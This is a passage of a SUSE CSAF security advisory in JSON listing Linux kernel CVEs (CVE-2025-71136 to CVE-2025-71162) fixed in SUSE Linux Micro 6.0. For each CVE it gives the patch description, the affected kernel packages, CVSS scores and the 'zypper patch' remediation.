"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call 